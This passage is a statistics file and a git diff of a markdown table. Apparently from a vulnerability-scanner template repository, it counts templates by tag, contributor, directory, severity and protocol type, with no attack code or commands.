(@conspiracyproof)","count":1},{"name":"makyotox","count":1},{"name":"orpheus","count":1},{"name":"0ut0fb4nd","count":1},{"name":"0xtavian","count":1},{"name":"mubassirpatel","count":1},{"name":"exploitation","count":1},{"name":"jrolf","count":1},{"name":"akshansh","count":1},{"name":"thebinitghimire","count":1},{"name":"retr0","count":1},{"name":"mesaglio","count":1},{"name":"bolli95","count":1},{"name":"furkansenan","count":1},{"name":"willd96","count":1},{"name":"its0x08","count":1},{"name":"mah3sec_","count":1},{"name":"affix","count":1},{"name":"flag007","count":1},{"name":"berkdusunur","count":1},{"name":"yashgoti","count":1},{"name":"push4d","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"hanlaomo","count":1},{"name":"shreyapohekar","count":1},{"name":"becivells","count":1},{"name":"kareemse1im","count":1},{"name":"alperenkesk","count":1},{"name":"j33n1k4","count":1},{"name":"nytr0gen","count":1},{"name":"pratik khalane","count":1},{"name":"jteles","count":1},{"name":"ooooooo_q","count":1},{"name":"b0yd","count":1},{"name":"pudsec","count":1},{"name":"d0rkerdevil","count":1},{"name":"hakluke","count":1},{"name":"petruknisme","count":1},{"name":"raesene","count":1},{"name":"nvn1729","count":1},{"name":"alex","count":1},{"name":"juicypotato1","count":1},{"name":"aresx","count":1},{"name":"0xteles","count":1},{"name":"manuelbua","count":1},{"name":"naglinagli","count":1},{"name":"absshax","count":1},{"name":"rotemreiss","count":1},{"name":"0xrod","count":1},{"name":"zhenwarx","count":1},{"name":"yashanand155","count":1},{"name":"ohlinge","count":1},{"name":"apt-mirror","count":1},{"name":"kurohost","count":1},{"name":"jeya seelan","count":1},{"name":"iampritam","count":1},{"name":"streetofhackerr007","count":1},{"name":"xstp","count":1},{"name":"alph4byt3","count":1},{"name":"kabirsuda","count":1},{"name":"revblock","count":1},{"name":"whynotke","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"th3.d1p4k","count":1},{"name":"0xd0ff9","count":1},{"name":"tirtha_mandal","count":1},{"name":"taielab","count":1},{"name":"sicksec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"forgedhallpass","count":1},{"name":"cookiehanhoan","count":1},{"name":"blckraven","count":1},{"name":"philippdelteil","count":1},{"name":"intx0x80","count":1},{"name":"luskabol","count":1},{"name":"chron0x","count":1},{"name":"elmahdi","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sec_hawk","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"toufik airane","count":1},{"name":"elder tao","count":1},{"name":"sickwell","count":1},{"name":"0h1in9e","count":1},{"name":"shifacyclewla","count":1},{"name":"mhdsamx","count":1},{"name":"shelld3v","count":1},{"name":"pdp","count":1},{"name":"droberson","count":1},{"name":"qlkwej","count":1},{"name":"noamrathaus","count":1},{"name":"oscarintherocks","count":1},{"name":"vzamanillo","count":1},{"name":"rojanrijal","count":1},{"name":"ahmed sherif","count":1},{"name":"s1r1u5_","count":1},{"name":"daviey","count":1},{"name":"schniggie","count":1},{"name":"@dwisiswant0","count":1},{"name":"bjhulst","count":1},{"name":"bad5ect0r","count":1},{"name":"evolutionsec","count":1},{"name":"ilovebinbash","count":1},{"name":"lark lab","count":1},{"name":"kre80r","count":1},{"name":"clarkvoss","count":1},{"name":"b4uh0lz","count":1},{"name":"patralos","count":1},{"name":"udyz","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ringo","count":1},{"name":"wabafet","count":1},{"name":"andirrahmani1","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"_darrenmartyn","count":1},{"name":"c3l3si4n","count":1},{"name":"undefl0w","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"knassar702","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"notsoevilweasel","count":1},{"name":"ipanda","count":1},{"name":"thezakman","count":1},{"name":"defr0ggy","count":1},{"name":"elouhi","count":1},{"name":"52971","count":1},{"name":"andysvints","count":1},{"name":"deena","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"thevillagehacker","count":1},{"name":"b0rn2r00t","count":1},{"name":"luci","count":1},{"name":"mass0ma","count":1},{"name":"x6263","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"ldionmarcil","count":1},{"name":"zandros0","count":1},{"name":"tim_koopmans","count":1},{"name":"smaranchand","count":1},{"name":"yavolo","count":1},{"name":"fopina","count":1},{"name":"dawid-czarnecki","count":1},{"name":"remonsec","count":1},{"name":"sshell","count":1},{"name":"infosecsanyam","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"omarkurt","count":1},{"name":"@github.com/defr0ggy","count":1}],"directory":[{"name":"cves","count":837},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":141},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":649},{"name":"medium","count":476},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2211},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 32a1631abc..2d10f4b6f9 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,926 +1,926 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 832 | daffainfo | 288 | cves | 836 | info | 750 | http | 2211 | +| cve | 833 | daffainfo | 288 | cves | 837 | info | 749 | http | 2211 | | lfi | 342 | pikpikcu | 281 | vulnerabilities | 327 | high | 649 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 270 | medium | 475 | network | 45 | +| panel | 272 | dhiyaneshdk | 279 | exposed-panels | 269 | medium | 476 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | | wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | | exposure | 240 | dwisiswant0 | 131 | misconfiguration | 141 | | | | | | rce | 214 | gy741 | 81 | takeovers | 65 | | | | | -| tech | 197 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 67 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | +| tech | 196 | pussycat0x | 72 | token-spray | 63 | | | | | +| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 165 | zzeitlin | 63 | file | 50 | | | | | | cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | | joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | -| config | 95 | ice3man | 26 | dns | 12 | | | | | +| config | 96 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 92 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | pr3r00t | 15 | cnvd | 9 | | | | | | iot | 70 | sheikhrishad | 15 | headless | 5 | | | | | -| takeover | 69 | milo2012 | 14 | | | | | | | -| oob | 68 | techbrunchfr | 13 | | | | | | | +| oast | 69 | milo2012 | 14 | | | | | | | +| takeover | 69 | techbrunchfr | 13 | | | | | | | | default-login | 68 | suman_kar | 12 | | | | | | | -| token | 67 | cyllective | 11 | | | | | | | -| token-spray | 63 | r3dg33k | 11 | | | | | | | -| cve2017 | 51 | random_robbie | 10 | | | | | | | -| file | 50 | righettod | 10 | | | | | | | -| unauth | 49 | melbadry9 | 10 | | | | | | | -| network | 43 | nadino | 10 | | | | | | | -| ssrf | 41 | wdahlenb | 10 | | | | | | | +| token | 67 | r3dg33k | 11 | | | | | | | +| token-spray | 63 | cyllective | 11 | | | | | | | +| cve2017 | 51 | nadino | 10 | | | | | | | +| file | 50 | random_robbie | 10 | | | | | | | +| unauth | 49 | wdahlenb | 10 | | | | | | | +| network | 43 | righettod | 10 | | | | | | | +| ssrf | 42 | melbadry9 | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | zh | 8 | | | | | | | -| redirect | 37 | aashiq | 8 | | | | | | | -| cve2016 | 37 | iamthefrogy | 8 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| google | 30 | randomstr1ng | 7 | | | | | | | -| cve2015 | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | harshbothra_ | 7 | | | | | | | -| jira | 29 | meme-lord | 7 | | | | | | | -| cve2014 | 27 | 0x240x23elu | 7 | | | | | | | -| cisco | 27 | dogasantos | 7 | | | | | | | -| listing | 27 | kophjager007 | 7 | | | | | | | -| generic | 24 | dr_set | 7 | | | | | | | +| | 38 | iamthefrogy | 8 | | | | | | | +| cve2016 | 37 | zh | 8 | | | | | | | +| redirect | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | aashiq | 8 | | | | | | | +| google | 30 | meme-lord | 7 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| jira | 29 | techryptic (@tech) | 7 | | | | | | | +| cve2015 | 29 | randomstr1ng | 7 | | | | | | | +| atlassian | 29 | kophjager007 | 7 | | | | | | | +| cisco | 27 | 0x240x23elu | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| listing | 27 | dogasantos | 7 | | | | | | | +| generic | 24 | oppsec | 7 | | | | | | | | misc | 23 | emadshanab | 7 | | | | | | | -| disclosure | 23 | divya_mudgal | 6 | | | | | | | -| auth-bypass | 23 | caspergn | 6 | | | | | | | -| misconfig | 22 | logicalhunter | 6 | | | | | | | -| router | 22 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| disclosure | 23 | pentest_swissky | 6 | | | | | | | +| router | 22 | divya_mudgal | 6 | | | | | | | +| misconfig | 22 | caspergn | 6 | | | | | | | | aem | 19 | __fazal | 6 | | | | | | | -| cve2012 | 18 | pentest_swissky | 6 | | | | | | | -| springboot | 18 | panch0r3d | 5 | | | | | | | -| sap | 18 | lu4nx | 5 | | | | | | | -| debug | 18 | ganofins | 5 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| devops | 15 | rootxharsh | 5 | | | | | | | -| cve2011 | 15 | iamnoooob | 5 | | | | | | | -| login | 14 | elsfa7110 | 5 | | | | | | | -| fuzz | 14 | xelkomy | 5 | | | | | | | +| cve2012 | 18 | puzzlepeaches | 6 | | | | | | | +| debug | 18 | elsfa7110 | 5 | | | | | | | +| springboot | 18 | iamnoooob | 5 | | | | | | | +| sap | 18 | johnk3r | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | panch0r3d | 5 | | | | | | | +| devops | 15 | ganofins | 5 | | | | | | | +| login | 14 | yanyun | 5 | | | | | | | | cve2009 | 14 | joanbono | 5 | | | | | | | -| aws | 14 | johnk3r | 5 | | | | | | | -| weblogic | 14 | nodauf | 4 | | | | | | | -| struts | 14 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | e_schultze_ | 4 | | | | | | | -| android | 13 | wisnupramoedya | 4 | | | | | | | -| dlink | 13 | tess | 4 | | | | | | | -| adobe | 13 | incogbyte | 4 | | | | | | | -| deserialization | 13 | mavericknerd | 3 | | | | | | | -| zoho | 13 | shifacyclewala | 3 | | | | | | | -| manageengine | 12 | fyoorer | 3 | | | | | | | -| jenkins | 12 | sullo | 3 | | | | | | | -| wp-theme | 12 | yash anand @yashanand155 | 3 | | | | | | | -| magento | 11 | vsh00t | 3 | | | | | | | -| cve2013 | 11 | binaryfigments | 3 | | | | | | | -| intrusive | 10 | impramodsargar | 3 | | | | | | | -| xxe | 10 | johnjhacking | 3 | | | | | | | -| dell | 10 | unstabl3 | 3 | | | | | | | -| hp | 10 | 0w4ys | 3 | | | | | | | -| vmware | 9 | z3bd | 3 | | | | | | | -| ftp | 9 | jarijaas | 3 | | | | | | | -| kubernetes | 9 | me9187 | 3 | | | | | | | -| gitlab | 8 | idealphase | 3 | | | | | | | -| scada | 8 | sushantkamble | 3 | | | | | | | -| cve2008 | 8 | _generic_human_ | 3 | | | | | | | -| airflow | 8 | dudez | 3 | | | | | | | -| backup | 8 | emenalf | 3 | | | | | | | -| ibm | 8 | shine | 3 | | | | | | | -| microsoft | 8 | f1tz | 3 | | | | | | | -| rails | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | -| ruijie | 8 | parth | 2 | | | | | | | -| nginx | 8 | alifathi-h1 | 2 | | | | | | | -| fastjson | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| netgear | 7 | g4l1t0 | 2 | | | | | | | -| files | 7 | afaq | 2 | | | | | | | -| cms | 7 | swissky | 2 | | | | | | | -| coldfusion | 7 | nkxxkn | 2 | | | | | | | -| confluence | 7 | koti2 | 2 | | | | | | | -| jetty | 6 | bernardofsr | 2 | | | | | | | -| nodejs | 6 | lotusdll | 2 | | | | | | | -| lucee | 6 | moritz nentwig | 2 | | | | | | | -| phpmyadmin | 6 | huowuzhao | 2 | | | | | | | -| solr | 6 | socketz | 2 | | | | | | | -| drupal | 6 | arcc | 2 | | | | | | | -| django | 6 | 0xsapra | 2 | | | | | | | -| laravel | 6 | 0xelkomy | 2 | | | | | | | -| rconfig | 6 | sy3omda | 2 | | | | | | | -| citrix | 6 | gal nagli | 2 | | | | | | | -| api | 6 | dheerajmadhukar | 2 | | | | | | | -| fileupload | 6 | joeldeleep | 2 | | | | | | | -| docker | 6 | bing0o | 2 | | | | | | | -| camera | 6 | fabaff | 2 | | | | | | | -| crlf | 5 | 0xsmiley | 2 | | | | | | | -| jolokia | 5 | r12w4n | 2 | | | | | | | -| circarlife | 5 | hahwul | 2 | | | | | | | -| printer | 5 | pxmme1337 | 2 | | | | | | | -| java | 5 | zomsop82 | 2 | | | | | | | -| headless | 5 | ree4pwn | 2 | | | | | | | -| windows | 5 | whoever | 2 | | | | | | | -| iis | 5 | udit_thakkur | 2 | | | | | | | -| dedecms | 5 | mohammedsaneem | 2 | | | | | | | -| ssti | 5 | davidmckennirey | 2 | | | | | | | -| tomcat | 5 | random-robbie | 2 | | | | | | | -| git | 4 | amsda | 2 | | | | | | | -| vpn | 4 | foulenzer | 2 | | | | | | | -| wso2 | 4 | r3naissance | 2 | | | | | | | -| thinkphp | 4 | manas_harsh | 2 | | | | | | | -| npm | 4 | vavkamil | 2 | | | | | | | -| slack | 4 | kiblyn11 | 2 | | | | | | | -| exchange | 4 | 0xrudra | 2 | | | | | | | -| symantec | 4 | bsysop | 2 | | | | | | | -| firmware | 4 | randomrobbie | 2 | | | | | | | -| webserver | 4 | cocxanh | 2 | | | | | | | -| artifactory | 4 | x1m_martijn | 2 | | | | | | | -| zimbra | 4 | gevakun | 2 | | | | | | | -| magmi | 4 | bp0lr | 2 | | | | | | | -| firebase | 4 | convisoappsec | 2 | | | | | | | -| symfony | 4 | 0xcrypto | 2 | | | | | | | -| samsung | 4 | 0xprial | 2 | | | | | | | -| solarwinds | 4 | hetroublemakr | 2 | | | | | | | -| buffalo | 4 | ehsahil | 2 | | | | | | | -| hongdian | 4 | w4cky_ | 2 | | | | | | | -| rfi | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| resin | 4 | ratnadip gajbhiye | 1 | | | | | | | -| strapi | 4 | shelld3v | 1 | | | | | | | -| maps | 4 | 0xrod | 1 | | | | | | | -| zabbix | 4 | orpheus | 1 | | | | | | | -| moodle | 4 | becivells | 1 | | | | | | | -| traversal | 4 | @ofjaaah | 1 | | | | | | | -| elastic | 4 | pratik khalane | 1 | | | | | | | -| fatpipe | 4 | nvn1729 | 1 | | | | | | | -| glpi | 4 | smaranchand | 1 | | | | | | | -| proxy | 4 | elmahdi | 1 | | | | | | | -| amazon | 4 | raesene | 1 | | | | | | | -| asp | 4 | naglinagli | 1 | | | | | | | -| grafana | 4 | zandros0 | 1 | | | | | | | -| thinkcmf | 4 | infosecsanyam | 1 | | | | | | | -| httpd | 3 | mass0ma | 1 | | | | | | | -| cacti | 3 | taielab | 1 | | | | | | | -| lfr | 3 | xstp | 1 | | | | | | | -| springcloud | 3 | ipanda | 1 | | | | | | | -| bigip | 3 | yashanand155 | 1 | | | | | | | -| search | 3 | thezakman | 1 | | | | | | | -| ofbiz | 3 | blckraven | 1 | | | | | | | -| fanruan | 3 | b0yd | 1 | | | | | | | -| oa | 3 | udyz | 1 | | | | | | | -| cloud | 3 | patralos | 1 | | | | | | | -| vbulletin | 3 | bernardo rodrigues | 1 | | | | | | | +| aws | 14 | lu4nx | 5 | | | | | | | +| struts | 14 | xelkomy | 5 | | | | | | | +| weblogic | 14 | incogbyte | 4 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | wisnupramoedya | 4 | | | | | | | +| deserialization | 13 | nodauf | 4 | | | | | | | +| adobe | 13 | github.com/its0x08 | 4 | | | | | | | +| android | 13 | tess | 4 | | | | | | | +| dlink | 13 | 0w4ys | 3 | | | | | | | +| dns | 13 | me9187 | 3 | | | | | | | +| jenkins | 12 | f1tz | 3 | | | | | | | +| manageengine | 12 | shifacyclewala | 3 | | | | | | | +| wp-theme | 12 | z3bd | 3 | | | | | | | +| magento | 11 | idealphase | 3 | | | | | | | +| cve2013 | 11 | yash anand @yashanand155 | 3 | | | | | | | +| xxe | 10 | binaryfigments | 3 | | | | | | | +| dell | 10 | mavericknerd | 3 | | | | | | | +| intrusive | 10 | shine | 3 | | | | | | | +| hp | 10 | jarijaas | 3 | | | | | | | +| kubernetes | 9 | dudez | 3 | | | | | | | +| vmware | 9 | unstabl3 | 3 | | | | | | | +| ftp | 9 | _generic_human_ | 3 | | | | | | | +| gitlab | 8 | fyoorer | 3 | | | | | | | +| cnvd | 8 | sushantkamble | 3 | | | | | | | +| ruijie | 8 | johnjhacking | 3 | | | | | | | +| airflow | 8 | impramodsargar | 3 | | | | | | | +| microsoft | 8 | vsh00t | 3 | | | | | | | +| nginx | 8 | emenalf | 3 | | | | | | | +| scada | 8 | sullo | 3 | | | | | | | +| fastjson | 8 | skeltavik | 3 | | | | | | | +| cve2008 | 8 | thomas_from_offensity | 3 | | | | | | | +| rails | 8 | dheerajmadhukar | 2 | | | | | | | +| backup | 8 | bp0lr | 2 | | | | | | | +| ibm | 8 | gal nagli | 2 | | | | | | | +| confluence | 7 | r12w4n | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| cms | 7 | kiblyn11 | 2 | | | | | | | +| coldfusion | 7 | socketz | 2 | | | | | | | +| netgear | 7 | bsysop | 2 | | | | | | | +| nodejs | 6 | random-robbie | 2 | | | | | | | +| camera | 6 | udit_thakkur | 2 | | | | | | | +| laravel | 6 | gevakun | 2 | | | | | | | +| citrix | 6 | vavkamil | 2 | | | | | | | +| api | 6 | 0xelkomy | 2 | | | | | | | +| phpmyadmin | 6 | koti2 | 2 | | | | | | | +| solr | 6 | whoever | 2 | | | | | | | +| django | 6 | moritz nentwig | 2 | | | | | | | +| jetty | 6 | 0xrudra | 2 | | | | | | | +| drupal | 6 | huowuzhao | 2 | | | | | | | +| lucee | 6 | nkxxkn | 2 | | | | | | | +| docker | 6 | lotusdll | 2 | | | | | | | +| rconfig | 6 | fabaff | 2 | | | | | | | +| fileupload | 6 | g4l1t0 | 2 | | | | | | | +| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| headless | 5 | manas_harsh | 2 | | | | | | | +| tomcat | 5 | hahwul | 2 | | | | | | | +| circarlife | 5 | amsda | 2 | | | | | | | +| windows | 5 | hetroublemakr | 2 | | | | | | | +| jolokia | 5 | zomsop82 | 2 | | | | | | | +| crlf | 5 | bernardofsr | 2 | | | | | | | +| dedecms | 5 | randomrobbie | 2 | | | | | | | +| printer | 5 | alifathi-h1 | 2 | | | | | | | +| iis | 5 | sy3omda | 2 | | | | | | | +| ssti | 5 | 0xcrypto | 2 | | | | | | | +| vpn | 4 | ehsahil | 2 | | | | | | | +| slack | 4 | mohammedsaneem | 2 | | | | | | | +| artifactory | 4 | 0xprial | 2 | | | | | | | +| npm | 4 | 0xsmiley | 2 | | | | | | | +| samsung | 4 | davidmckennirey | 2 | | | | | | | +| zabbix | 4 | ree4pwn | 2 | | | | | | | +| exchange | 4 | convisoappsec | 2 | | | | | | | +| thinkcmf | 4 | r3naissance | 2 | | | | | | | +| asp | 4 | 0xsapra | 2 | | | | | | | +| rfi | 4 | afaq | 2 | | | | | | | +| proxy | 4 | x1m_martijn | 2 | | | | | | | +| strapi | 4 | w4cky_ | 2 | | | | | | | +| magmi | 4 | foulenzer | 2 | | | | | | | +| firebase | 4 | arcc | 2 | | | | | | | +| wso2 | 4 | bing0o | 2 | | | | | | | +| symantec | 4 | pxmme1337 | 2 | | | | | | | +| glpi | 4 | cocxanh | 2 | | | | | | | +| thinkphp | 4 | joeldeleep | 2 | | | | | | | +| buffalo | 4 | parth | 2 | | | | | | | +| webserver | 4 | flag007 | 1 | | | | | | | +| moodle | 4 | ajaysenr | 1 | | | | | | | +| fatpipe | 4 | nytr0gen | 1 | | | | | | | +| keycloak | 4 | micha3lb3n | 1 | | | | | | | +| resin | 4 | makyotox | 1 | | | | | | | +| solarwinds | 4 | manuelbua | 1 | | | | | | | +| amazon | 4 | clarkvoss | 1 | | | | | | | +| grafana | 4 | iampritam | 1 | | | | | | | +| zimbra | 4 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| firmware | 4 | dawid-czarnecki | 1 | | | | | | | +| elastic | 4 | absshax | 1 | | | | | | | +| symfony | 4 | notsoevilweasel | 1 | | | | | | | +| git | 4 | akash.c | 1 | | | | | | | +| hongdian | 4 | shifacyclewla | 1 | | | | | | | +| maps | 4 | aceseven (digisec360) | 1 | | | | | | | +| traversal | 4 | shreyapohekar | 1 | | | | | | | +| ebs | 3 | kba@sogeti_esec | 1 | | | | | | | +| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | +| cve2007 | 3 | hanlaomo | 1 | | | | | | | +| ofbiz | 3 | sshell | 1 | | | | | | | +| terramaster | 3 | tirtha_mandal | 1 | | | | | | | +| opensis | 3 | philippdelteil | 1 | | | | | | | +| r-seenet | 3 | ringo | 1 | | | | | | | +| cves | 3 | bolli95 | 1 | | | | | | | +| targa | 3 | mass0ma | 1 | | | | | | | +| kibana | 3 | zhenwarx | 1 | | | | | | | +| mail | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| smtp | 3 | nerrorsec | 1 | | | | | | | +| fpd | 3 | xstp | 1 | | | | | | | +| backdoor | 3 | rodnt | 1 | | | | | | | +| openam | 3 | 0xrod | 1 | | | | | | | +| azure | 3 | j33n1k4 | 1 | | | | | | | +| fanruan | 3 | fmunozs | 1 | | | | | | | +| springcloud | 3 | c3l3si4n | 1 | | | | | | | +| lfr | 3 | orpheus | 1 | | | | | | | +| cacti | 3 | 0ut0fb4nd | 1 | | | | | | | +| microstrategy | 3 | geraldino2 | 1 | | | | | | | +| vbulletin | 3 | berkdusunur | 1 | | | | | | | +| cloud | 3 | th3.d1p4k | 1 | | | | | | | +| log | 3 | infosecsanyam | 1 | | | | | | | +| telerik | 3 | co0nan | 1 | | | | | | | +| nosqli | 3 | ilovebinbash | 1 | | | | | | | +| bitrix | 3 | apt-mirror | 1 | | | | | | | +| openssh | 3 | kre80r | 1 | | | | | | | +| lansweeper | 3 | elmahdi | 1 | | | | | | | +| hoteldruid | 3 | pratik khalane | 1 | | | | | | | +| node | 3 | adrianmf | 1 | | | | | | | +| jellyfin | 3 | izn0u | 1 | | | | | | | +| kafka | 3 | _c0wb0y_ | 1 | | | | | | | +| mongodb | 3 | regala_ | 1 | | | | | | | +| github | 3 | ohlinge | 1 | | | | | | | +| prometheus | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| exposures | 3 | tim_koopmans | 1 | | | | | | | +| itop | 3 | thevillagehacker | 1 | | | | | | | +| kevinlab | 3 | s1r1u5_ | 1 | | | | | | | +| search | 3 | raesene | 1 | | | | | | | +| httpd | 3 | _darrenmartyn | 1 | | | | | | | +| linkerd | 3 | sicksec | 1 | | | | | | | +| tikiwiki | 3 | pudsec | 1 | | | | | | | +| druid | 3 | sec_hawk | 1 | | | | | | | +| nacos | 3 | un-fmunozs | 1 | | | | | | | +| oa | 3 | smaranchand | 1 | | | | | | | +| jeesns | 3 | d0rkerdevil | 1 | | | | | | | +| nexus | 3 | kareemse1im | 1 | | | | | | | +| bigip | 3 | juicypotato1 | 1 | | | | | | | +| ssh | 3 | shelld3v | 1 | | | | | | | +| caucho | 3 | yashgoti | 1 | | | | | | | +| injection | 3 | droberson | 1 | | | | | | | +| mida | 2 | yavolo | 1 | | | | | | | +| totemomail | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| ssh | 3 | furkansenan | 1 | | | | | | | -| prometheus | 3 | _c0wb0y_ | 1 | | | | | | | -| sonicwall | 3 | elder tao | 1 | | | | | | | -| fpd | 3 | alperenkesk | 1 | | | | | | | -| ebs | 3 | tim_koopmans | 1 | | | | | | | -| openssh | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| kibana | 3 | streetofhackerr007 | 1 | | | | | | | -| telerik | 3 | bjhulst | 1 | | | | | | | -| mail | 3 | j33n1k4 | 1 | | | | | | | -| kafka | 3 | ahmed sherif | 1 | | | | | | | -| exposures | 3 | lark lab | 1 | | | | | | | -| nexus | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| injection | 3 | kareemse1im | 1 | | | | | | | -| log | 3 | undefl0w | 1 | | | | | | | -| bitrix | 3 | intx0x80 | 1 | | | | | | | -| openam | 3 | b0rn2r00t | 1 | | | | | | | -| r-seenet | 3 | rotemreiss | 1 | | | | | | | -| opensis | 3 | luskabol | 1 | | | | | | | -| microstrategy | 3 | noamrathaus | 1 | | | | | | | -| mongodb | 3 | shreyapohekar | 1 | | | | | | | -| caucho | 3 | soyelmago | 1 | | | | | | | -| node | 3 | fmunozs | 1 | | | | | | | -| smtp | 3 | yashgoti | 1 | | | | | | | -| terramaster | 3 | clarkvoss | 1 | | | | | | | -| nacos | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| backdoor | 3 | gboddin | 1 | | | | | | | -| cves | 3 | wabafet | 1 | | | | | | | -| jellyfin | 3 | adrianmf | 1 | | | | | | | -| nosqli | 3 | manuelbua | 1 | | | | | | | -| lansweeper | 3 | qlkwej | 1 | | | | | | | -| hoteldruid | 3 | mesaglio | 1 | | | | | | | -| targa | 3 | jrolf | 1 | | | | | | | -| tikiwiki | 3 | jteles | 1 | | | | | | | -| cve2007 | 3 | chron0x | 1 | | | | | | | -| github | 3 | jeya seelan | 1 | | | | | | | -| linkerd | 3 | ringo | 1 | | | | | | | -| druid | 3 | omarkurt | 1 | | | | | | | -| zhiyuan | 3 | kba@sogeti_esec | 1 | | | | | | | -| azure | 3 | micha3lb3n | 1 | | | | | | | -| itop | 3 | thebinitghimire | 1 | | | | | | | -| jeesns | 3 | petruknisme | 1 | | | | | | | -| kevinlab | 3 | andysvints | 1 | | | | | | | -| aruba | 2 | elouhi | 1 | | | | | | | -| showdoc | 2 | aresx | 1 | | | | | | | -| status | 2 | mhdsamx | 1 | | | | | | | -| waf | 2 | aaron_costello | 1 | | | | | | | +| spark | 2 | bjhulst | 1 | | | | | | | +| middleware | 2 | 0xtavian | 1 | | | | | | | +| axis | 2 | thebinitghimire | 1 | | | | | | | +| jboss | 2 | alex | 1 | | | | | | | +| qcubed | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| hashicorp | 2 | deena | 1 | | | | | | | +| places | 2 | b0yd | 1 | | | | | | | +| leak | 2 | brabbit10 | 1 | | | | | | | +| harbor | 2 | noamrathaus | 1 | | | | | | | +| guacamole | 2 | nvn1729 | 1 | | | | | | | +| rancher | 2 | 0h1in9e | 1 | | | | | | | +| ecoa | 2 | furkansenan | 1 | | | | | | | +| bitly | 2 | 0xteles | 1 | | | | | | | +| cache | 2 | jeya seelan | 1 | | | | | | | +| huawei | 2 | borna nematzadeh | 1 | | | | | | | +| emerge | 2 | remonsec | 1 | | | | | | | +| odoo | 2 | kabirsuda | 1 | | | | | | | +| qihang | 2 | pdp | 1 | | | | | | | +| nextcloud | 2 | streetofhackerr007 | 1 | | | | | | | +| saltstack | 2 | becivells | 1 | | | | | | | +| lotus | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| hpe | 2 | kurohost | 1 | | | | | | | +| horde | 2 | evolutionsec | 1 | | | | | | | +| sonarqube | 2 | bad5ect0r | 1 | | | | | | | +| favicon | 2 | yashanand155 | 1 | | | | | | | +| couchdb | 2 | whynotke | 1 | | | | | | | +| sitecore | 2 | mesaglio | 1 | | | | | | | +| dolibarr | 2 | affix | 1 | | | | | | | +| shellshock | 2 | willd96 | 1 | | | | | | | +| seeyon | 2 | naglinagli | 1 | | | | | | | +| storage | 2 | aresx | 1 | | | | | | | +| bruteforce | 2 | 52971 | 